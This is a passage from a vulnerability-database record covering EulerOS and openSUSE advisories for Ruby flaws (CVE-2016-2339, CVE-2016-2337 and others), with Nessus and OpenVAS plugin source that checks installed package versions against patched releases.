According to the versions of the ruby packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities:
- An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function of Ruby. In Fiddle::Function.new 'initialize', the heap buffer 'arg_types' is allocated based on the length of the args array. A specially constructed object passed as an element of the args array can increase the array's size after that allocation and cause a heap overflow. (CVE-2016-2339)
- Type confusion exists in the _cancel_eval method of Ruby's TclTkIp class. An attacker who passes an object of a type other than String as the 'retval' argument can cause arbitrary code execution. (CVE-2016-2337)
Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
{"id": "EULEROS_SA-2017-1051.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS 2.0 SP2 : ruby (EulerOS-SA-2017-1051)", "description": "According to the versions of the ruby packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2017-05-01T00:00:00", "modified": "2021-04-19T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/99896", "reporter": "This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2337", "http://www.nessus.org/u?d7ccee39"], "cvelist": ["CVE-2015-3900", "CVE-2016-2337", "CVE-2016-2339"], "immutableFields": [], "lastseen": "2023-05-18T14:11:13", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2015-547", "ALAS-2015-548", "ALAS-2015-549"]}, {"type": "cve", "idList": ["CVE-2015-3900", "CVE-2015-4020", "CVE-2016-2337", "CVE-2016-2339"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1421-1:5BC60", "DEBIAN:DLA-1480-1:C4833"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-3900", "DEBIANCVE:CVE-2015-4020", "DEBIANCVE:CVE-2016-2337", "DEBIANCVE:CVE-2016-2339"]}, {"type": "fedora", "idList": ["FEDORA:0FC496087B07", "FEDORA:4A0D661A5EC1", "FEDORA:B90ED608757D"]}, {"type": "freebsd", "idList": ["A0089E18-FC9E-11E4-BC58-001E67150279"]}, {"type": "gentoo", "idList": ["GLSA-201710-18"]}, {"type": "github", "idList": ["GHSA-QV62-XFJ6-32XM", "GHSA-WP3J-RVFP-624H"]}, {"type": "hackerone", "idList": ["H1:103993", "H1:218088"]}, {"type": "mageia", "idList": ["MGASA-2015-0345", "MGASA-2017-0290"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-547.NASL", "ALA_ALAS-2015-548.NASL", "ALA_ALAS-2015-549.NASL", "DEBIAN_DLA-1421.NASL", "DEBIAN_DLA-1480.NASL", "EULEROS_SA-2017-1050.NASL", "EULEROS_SA-2019-1617.NASL", "FEDORA_2015-12501.NASL", "FEDORA_2015-12574.NASL", "FEDORA_2015-13157.NASL", "FREEBSD_PKG_A0089E18FC9E11E4BC58001E67150279.NASL", "GENTOO_GLSA-201710-18.NASL", "OPENSUSE-2017-435.NASL", "OPENSUSE-2017-527.NASL", "PHOTONOS_PHSA-2017-0002.NASL", "PHOTONOS_PHSA-2017-0002_RUBY.NASL", "PUPPET_ENTERPRISE_CVE_2015-4100.NASL", "SUSE_SU-2017-1067-1.NASL", "SUSE_SU-2020-1570-1.NASL", "UBUNTU_USN-3365-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120440", 
"OPENVAS:1361412562310120441", "OPENVAS:1361412562310120442", "OPENVAS:1361412562310130042", "OPENVAS:1361412562310843256", "OPENVAS:1361412562310851531", "OPENVAS:1361412562310851543", "OPENVAS:1361412562310869851", "OPENVAS:1361412562310869888", "OPENVAS:1361412562310891421", "OPENVAS:1361412562310891480", "OPENVAS:1361412562311220171050", "OPENVAS:1361412562311220171051"]}, {"type": "osv", "idList": ["OSV:DLA-1421-1", "OSV:DLA-1480-1", "OSV:GHSA-QV62-XFJ6-32XM", "OSV:GHSA-WP3J-RVFP-624H"]}, {"type": "redhat", "idList": ["RHSA-2015:1657"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-2337", "RH:CVE-2016-2339"]}, {"type": "rubygems", "idList": ["RUBY:RUBYGEMS-UPDATE-2015-3900-122162", "RUBY:RUBYGEMS-UPDATE-2015-4020"]}, {"type": "seebug", "idList": ["SSV:96756", "SSV:96759"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:0933-1", "OPENSUSE-SU-2017:1128-1", "SUSE-SU-2017:0914-1", "SUSE-SU-2017:1067-1"]}, {"type": "talos", "idList": ["TALOS-2016-0031", "TALOS-2016-0034"]}, {"type": "threatpost", "idList": ["THREATPOST:47105F0F1A3DAF664EEDC82B887B86A7"]}, {"type": "ubuntu", "idList": ["USN-3365-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-3900", "UB:CVE-2015-4020", "UB:CVE-2016-2337", "UB:CVE-2016-2339"]}, {"type": "veracode", "idList": ["VERACODE:11752"]}]}, "score": {"value": 9.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2015-549"]}, {"type": "cve", "idList": ["CVE-2015-3900"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1480-1:C4833"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-2339"]}, {"type": "fedora", "idList": ["FEDORA:0FC496087B07"]}, {"type": "hackerone", "idList": ["H1:218088"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-1570-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107358"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-2337"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1067-1"]}, {"type": "talos", "idList": ["TALOS-2016-0031"]}, {"type": "threatpost", "idList": 
["THREATPOST:47105F0F1A3DAF664EEDC82B887B86A7"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-3900", "epss": 0.00845, "percentile": 0.79764, "modified": "2023-05-06"}, {"cve": "CVE-2016-2337", "epss": 0.04839, "percentile": 0.91514, "modified": "2023-05-06"}, {"cve": "CVE-2016-2339", "epss": 0.0105, "percentile": 0.81849, "modified": "2023-05-06"}], "vulnersScore": 9.1}, "_state": {"dependencies": 1684432139, "score": 1684420907, "epss": 0}, "_internal": {"score_hash": "d3cc1d5a0fb6ff2d34c2f7330fa05141"}, "pluginID": "99896", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99896);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/19\");\n\n script_cve_id(\n \"CVE-2015-3900\",\n \"CVE-2016-2337\",\n \"CVE-2016-2339\"\n );\n script_bugtraq_id(\n 75482\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : ruby (EulerOS-SA-2017-1051)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in\n the Fiddle::Function.new 'initialize' function\n functionality of Ruby. In Fiddle::Function.new\n 'initialize' heap buffer 'arg_types' allocation is made\n based on args array length. Specially constructed\n object passed as element of args array can increase\n this array size after mentioned allocation and cause\n heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp\n class method. 
Attacker passing different type of object\n than String as 'retval' argument can cause arbitrary\n code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1051\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7ccee39\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.598-25.h3\",\n \"ruby-irb-2.0.0.598-25.h3\",\n \"ruby-libs-2.0.0.598-25.h3\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:ruby", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby-libs", 
"cpe:/o:huawei:euleros:2.0"], "solution": "Update the affected ruby packages.", "nessusSeverity": "High", "cvssScoreSource": "", "vendor_cvss2": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}
{"openvas": [{"lastseen": "2020-01-27T18:36:51", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2015-3900", "CVE-2016-2339"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171050", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171050", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1050\");\n script_version(\"2020-01-23T10:46:37+0000\");\n script_cve_id(\"CVE-2015-3900\", \"CVE-2016-2337\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:37 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:37 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1050)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1050\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1050\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2017-1050 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. 
Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.353~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.353~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.353~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:38:29", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1051)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2015-3900", "CVE-2016-2339"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171051", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171051", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1051\");\n script_version(\"2020-01-23T10:46:39+0000\");\n script_cve_id(\"CVE-2015-3900\", \"CVE-2016-2337\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:39 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:39 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1051)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1051\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1051\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2017-1051 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. 
Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.598~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.598~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.598~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:28:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-29T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ruby2.1 (openSUSE-SU-2017:1128-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2014-4975"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851543", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851543\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-29 07:16:59 +0200 (Sat, 29 Apr 2017)\");\n script_cve_id(\"CVE-2014-4975\", \"CVE-2015-1855\", \"CVE-2015-3900\", \"CVE-2015-7551\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ruby2.1 (openSUSE-SU-2017:1128-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.1'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This ruby2.1 update to version 2.1.9 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when fetching gems or\n making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through\n overly permissive matching of hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes()\n function (bsc#887877)\n\n Bugfixes:\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment\n variable properly 
(bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"ruby2.1 on openSUSE Leap 42.2, openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1128-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1\", rpm:\"libruby2_1-2_1~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1-debuginfo\", rpm:\"libruby2_1-2_1-debuginfo~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1\", rpm:\"ruby2.1~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debuginfo\", 